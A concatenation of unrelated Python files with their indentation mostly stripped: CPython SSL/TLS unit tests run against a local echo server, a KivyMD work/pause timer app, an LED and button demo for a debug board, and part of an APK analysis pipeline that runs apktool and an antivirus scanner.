conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
        # Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
main.py
|
from kivymd.app import MDApp
from kivymd.uix.label import MDLabel
from kivy.lang.builder import Builder
from kivy.properties import StringProperty, BooleanProperty, NumericProperty, ObjectProperty
import threading
import time
import datetime
from kivy.core.window import Window
from playsound import playsound
Window.size = (960, 720)
class TimerApp(MDApp):
pause_time = StringProperty('')
running_time = StringProperty('')
current_running_time = NumericProperty(0)
current_pause_time = NumericProperty(0)
how_long_to_work = NumericProperty(0)
how_long_to_pause = NumericProperty(0)
def __init__(self, **kwargs):
self.current_running_time = 0
self.current_pause_time = 0
self.in_work = True
self.in_pause = False
super().__init__(**kwargs)
    def build(self):
        # Read the spinner defaults from the widget tree returned by the
        # builder; self.root is not reliably available inside build().
        # All durations are stored internally in seconds.
        root = Builder.load_file('timer.kv')
        self.how_long_to_work = int(root.ids.work_spinner.value * 60)
        self.how_long_to_pause = int(root.ids.pause_spinner.value * 60)
        self.pause_time = str(datetime.timedelta(seconds=self.how_long_to_pause))
        self.running_time = str(datetime.timedelta(seconds=self.how_long_to_work))
        self.running = False
        return root
def start(self):
def run_thread():
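            # Countdown state machine: the work timer ticks down first and
            # plays a sound at zero; then the pause timer ticks down and
            # plays a sound at zero; once both are at zero, the timers are
            # reloaded from the configured durations and the cycle repeats.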
while self.running:
            if self.current_running_time > 0:
                self.current_running_time -= 1
                if self.current_running_time == 0:
                    playsound('finish_work.wav')
            elif self.current_pause_time > 0:
                self.current_pause_time -= 1
                if self.current_pause_time == 0:
                    playsound('finish_pause.wav')
            else:
                self.current_running_time = self.how_long_to_work
                self.current_pause_time = self.how_long_to_pause
self.running_time = str(datetime.timedelta(seconds=self.current_running_time))
self.pause_time = str(datetime.timedelta(seconds=self.current_pause_time))
time.sleep(1)
        if self.running:
            return  # a countdown thread is already running
        self.running = True
        thread = threading.Thread(target=run_thread, daemon=True)
        thread.start()
    def stop(self):
        self.running = False
    def reset(self):
        self.running = False
        # how_long_to_* are already in seconds, so no conversion is needed
        self.current_running_time = self.how_long_to_work
        self.current_pause_time = self.how_long_to_pause
        self.running_time = str(datetime.timedelta(seconds=self.current_running_time))
        self.pause_time = str(datetime.timedelta(seconds=self.current_pause_time))
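    # Spinner callbacks: `value` arrives in minutes, while the internal
    # counters are kept in seconds.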
def set_running_time(self, value):
self.running_time = str(datetime.timedelta(seconds=value*60))
self.how_long_to_work = int(value*60)
self.current_running_time = self.how_long_to_work
def set_pause_time(self, value):
self.pause_time = str(datetime.timedelta(seconds=value*60))
self.how_long_to_pause = int(value*60)
self.current_pause_time = self.how_long_to_pause
TimerApp().run()
|
threaded-button-demo.py
|
#!/usr/bin/env python3
"""UrsaLeo LEDdebug threaded button demo
Toggle LED6 while capturing button presses on SW1 & SW2
Press CTR+C to exit"""
import time
import threading
try:
from LEDdebug import LEDdebug
except ImportError:
try:
import sys
import os
sys.path.append("..")
sys.path.append(os.path.join(os.path.dirname(__file__), '..',
'LEDdebug'))
from LEDdebug import LEDdebug
except ImportError:
        print('LEDdebug import failed')
        sys.exit(1)
def button_pressed(device, button):
""" Callback function
Toggle LEDs when buttons are pressed"""
if button == 1: # Button 1
device.set_led(1, not device.get_led_state(1))
else: # Button 2
device.set_led(2, not device.get_led_state(2))
def interrupt(device):
""" Interrupt function
Trigger callback function if SW1 or SW2 are pressed"""
while True:
button = device.get_button()
if button: # Button SW1 or SW2 pressed
time.sleep(0.5) # Debounce
button_pressed(device, button)
def main():
# Create device
device = LEDdebug()
    # Detect button presses in the background
    button_thread = threading.Thread(target=interrupt, args=[device])
    button_thread.daemon = True
    button_thread.start()
while True:
try:
            # Toggle LED6 in the foreground
# Other processes can run here
device.set_led(6, not device.get_led_state(6))
time.sleep(1)
except KeyboardInterrupt:
# Turn the lights off when leaving!
device.set_leds(0)
exit(0)
if __name__ == '__main__':
main()
|
threads.py
|
import os
import datetime
import subprocess
import zipfile
from analyze.models import Project, Manifest, Avscan
from threading import Thread
import tools.axmlparserpy.apk as ApkParser
from apksa import settings
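# Project.status values used by the pipeline below (inferred from the
# handlers): 0 = queued, 1 = unzipping, 2 = apktool decode, 3 = AV scan,
# 4 = done.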
def get_file_path(path):
directory = os.path.join(settings.MEDIA_ROOT, path)
return directory
def get_tool_path(path):
directory = os.path.join(settings.TOOLS_DIR, path)
return directory
def project_thread_manager():
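    """Dispatch the next analysis thread: restart the newest project that
    has been stuck in status 1 for over an hour; if no project is in
    progress at all, start the newest queued (status 0) project."""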
project = Project.objects.order_by('-id').filter(status=1).first()
if project is not None and (
datetime.datetime.strptime(project.time, '%Y/%m/%d %H:%M:%S') + datetime.timedelta(hours=1)) \
< datetime.datetime.now():
project_thread_create(project)
if project is None:
project = Project.objects.order_by('-id').filter(status=0).first()
if project is not None:
project_thread_create(project)
def project_thread_create(project):
t = Thread(target=do_tools, args=(project,))
t.start()
def do_tools(project):
unzip_tool(project)
apk_tool(project)
parse_manifest(project)
avscan_tool(project)
def unzip_tool(project):
project.status = 1
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
zip_ref = zipfile.ZipFile(path, 'r')
save_path = path.rsplit(".", 1)[0] + "-unzipped"
zip_ref.extractall(save_path)
zip_ref.close()
def apk_tool(project):
project.status = 2
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
save_path = path.rsplit(".", 1)[0]
tool_path = get_tool_path('apktool/apktool.jar')
subprocess.Popen(['java', '-jar', tool_path, 'd', path, '-o', save_path, '-f'], stdout=subprocess.PIPE)
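    # NOTE: Popen returns immediately, so apktool may still be decoding
    # while the later pipeline stages run; none of them read the apktool
    # output directory, so they do not wait for it.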
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
def parse_manifest(project):
manifest = Manifest()
manifest.project = project
path = get_file_path(project.file.name)
parsed_apk = ApkParser.APK(path)
manifest.activities = parsed_apk.get_activities()
manifest.receivers = parsed_apk.get_receivers()
manifest.services = parsed_apk.get_services()
manifest.uses_permission = parsed_apk.get_permissions()
manifest.version_code = parsed_apk.get_androidversion_code()
manifest.version_name = parsed_apk.get_androidversion_name()
manifest.libraries = parsed_apk.get_libraries()
manifest.providers = parsed_apk.get_providers()
manifest.min_sdk = parsed_apk.get_min_sdk_version()
manifest.target_sdk = parsed_apk.get_target_sdk_version()
manifest.save()
def avscan_tool(project):
project.status = 3
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
tool_path = get_tool_path('plagueScanner/plaguescanner.py')
proc = subprocess.Popen(['python3', tool_path, path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = proc.communicate()[0].strip().decode('utf-8')
avscan = Avscan()
